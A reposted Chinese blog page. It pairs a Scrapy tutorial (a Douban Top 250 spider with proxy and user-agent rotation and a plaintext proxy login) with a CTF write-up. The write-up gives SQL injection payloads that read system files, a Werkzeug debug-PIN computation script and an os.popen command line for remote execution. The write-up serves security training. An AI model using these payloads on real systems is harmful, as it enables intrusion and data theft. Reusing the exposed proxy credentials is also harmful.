流行的爬虫框架,scrapy
框架,少量代码,迅速抓取
请求模块,spider爬虫模块(需要手写),调度器模块,管道数据保存模块(需要手写),引擎
每个模块只和引擎做交互
创建爬虫框架
 """scrapy startproject myspider"""
创建爬虫
"""scrapy genspider itcast itcast.cn"""
 """scrapy crawl itcast --nolog"""
翻页构造一个Request对象,确定url地址
直接携带cookies
模拟登录
post请求
中间件(距离那个近就叫什么中间件)
预处理request和response对象
代理ip
对请求进行定制化操作
中间件写到middlewares.py文件中,平时写的是下载器中间件
下载器中间件
爬虫中间件
中间件的使用方法,在middlewares.py中定义中间类
process_response,process_request两个方法
crawlspider的作用:crawlspider可以按照规则自动获取连接
crawlspider爬虫的创建:scrapy genspider -t crawl tencent hr.tencent.com
crawlspider中rules的使用:
rules是一个元组或者是列表,包含的是Rule对象
Rule表示规则,其中包含LinkExtractor,callback和follow等参数
LinkExtractor:连接提取器,可以通过正则或者是xpath来进行url地址的匹配
callback :表示经过连接提取器提取出来的url地址响应的回调函数,可以没有,没有表示响应不会进行回调函数的处理
follow:连接提取器提取的url地址对应的响应是否还会继续被rules中的规则进行提取,True表示会,Flase表示不会
经常应用于数据在一个页面上采集
1.编写普通爬虫
(1).创建项目
(2).明确目标
(3).创建爬虫
(4).保存内容
2.改造分布式爬虫
(1).改爬虫
1.导入scrapy_redis中的分布式爬虫类
2.继承类
3.注销 start_urls & allowed–domains
4.设置redis_key获取start_urls
5.配置__ints__获取允许的域
(2).改造配置文件
cop配置参数
言归正住,下面解释一下利用scrapy制作的豆瓣250小爬虫
items.py
import scrapy
class DoubanItem(scrapy.Item):
# define the fields for your item here like:
name = scrapy.Field()
pass
middlewares,py
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/spider-middleware.html
import random
from Douban.settings import USER_AGENT_LIST,PROXY_LIST
from scrapy import signals
import base64
# 定义一个中间件类
class RandomUserAgent(object):
def process_request(self, request, spider):
# print(request.headers['User-Agent'])
ua = random.choice(USER_AGENT_LIST)
request.headers['User-Agent'] = ua
class RandomProxy(object):
def process_request(self, request, spider):
proxy = random.choice(PROXY_LIST)
print(proxy)
if 'user_passwd' in proxy:
# 对账号密码进行编码,python3中base64编码的数据必须是bytes类型,所以需要encode
b64_up = base64.b64encode(proxy['user_passwd'].encode())
# 设置认证
request.headers['Proxy-Authorization'] = 'Basic ' + b64_up.decode()
# 设置代理
request.meta['proxy'] = proxy['ip_port']
else:
# 设置代理
request.meta['proxy'] = proxy['ip_port']
pipelines.py
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
class DoubanPipeline(object):
def process_item(self, item, spider):
return item
# -*- coding: utf-8 -*-
# Scrapy settings for Douban project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'Douban'
SPIDER_MODULES = ['Douban.spiders']
NEWSPIDER_MODULE = 'Douban.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'
USER_AGENT_LIST = [
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 ",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 ",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 ",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 ",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba"
]
PROXY_LIST =[
{"ip_port": "123.207.53.84:16816", "user_passwd": "morganna_mode_g:ggc22qxp"},
# {"ip_port": "122.234.206.43:9000"},
]
# Obey robots.txt rules
# ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'Douban.middlewares.DoubanSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
# 'Douban.middlewares.MyCustomDownloaderMiddleware': 543,
# 'Douban.middlewares.RandomUserAgent': 543,
'Douban.middlewares.RandomProxy': 543,
}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'Douban.pipelines.DoubanPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
movie.py
# -*- coding: utf-8 -*-
import scrapy
from Douban.items import DoubanItem
class MovieSpider(scrapy.Spider):
name = 'movie'
allowed_domains = ['douban.com']
start_urls = ['https://movie.douban.com/top250']
def parse(self, response):
print(response.request.headers['User-Agent'])
movie_list = response.xpath('//*[@id="content"]/div/div[1]/ol/li/div/div[2]')
# print(len(movie_list))
for movie in movie_list:
item = DoubanItem()
item['name'] = movie.xpath('./div[1]/a/span[1]/text()').extract_first()
yield item
next_url = response.xpath('//*[@id="content"]/div/div[1]/div[2]/span[3]/a/@href').extract_first()
if next_url != None:
next_url = response.urljoin(next_url)
yield scrapy.Request(url=next_url)
最后cd到程序目录
 """scrapy crawl movie --nolog"""
Original: https://blog.csdn.net/weixin_53227758/article/details/119080482
Author: 小赵呢
Title: 初识scrapy,以及豆瓣爬虫实例
相关阅读
Title: oh-my-notepro
知识点:求pin码
登录页面后测试可以发现在note_id处可以sql注入。

%27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23
可以得到用户名和密码,但用处不大。

pin码
可以用pin码登录控制台来

3.8的pin码计算脚本如下,需要以下信息:
- username,用户名,可以读取/etc/passwd得到
- modname,默认值为flask.app
- appname,默认值为Flask
- moddir,flask库下app.py的绝对路径(报错得到)
- uuidnode,当前网络的mac地址的十进制数,通过文件/sys/class/net/eth0/address得到16进制结果,转化为10进制进行计算
- machine_id,docker机器id,读取/etc/machine-id ,/proc/sys/kernel/random/boot_id ,/proc/self/cgroup,前两个任选一个与最后一个拼接
; app.py 路径
可以再报错处看

读mac
';create table bbb(name varchar(1000));load data local infile "/sys/class/net/eth0/address" into table ctf.bbb;%23
'union select 1,2,3,4,(select group_concat(name) from ctf.bbb);%23
再转成16进制
print(int('0242ac120003',16))
读/etc/machine-id
';create table machine(name varchar(1000));load data local infile "/etc/machine-id" into table ctf.machine;%23
'union select 1,2,3,4,(select GROUP_CONCAT(name) from ctf.machine)%23
读/proc/self/cgroup
';create table cc(name varchar(1000));load data local infile "/proc/self/cgroup" into table ctf.cc;%23
'union select 1,2,3,4,(select group_concat(name) from ctf.cc);%23
计算pin
import hashlib
from itertools import chain
probably_public_bits = [
'ctf'
'flask.app',
'Flask',
'/usr/local/lib/python3.8/site-packages/flask/app.py'
]
private_bits = [
'2485377957891',
'1cc402dd0e11d5ae18db04a6de87223d9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7'
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
拿flag
获得pin码后,到控制台执行命令
__import__("os").popen("cmd").read()
参考
Original: https://blog.csdn.net/shinygod/article/details/124329579
Author: succ3
Title: oh-my-notepro
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/353556/
转载文章受原作者版权保护。转载请注明原作者出处!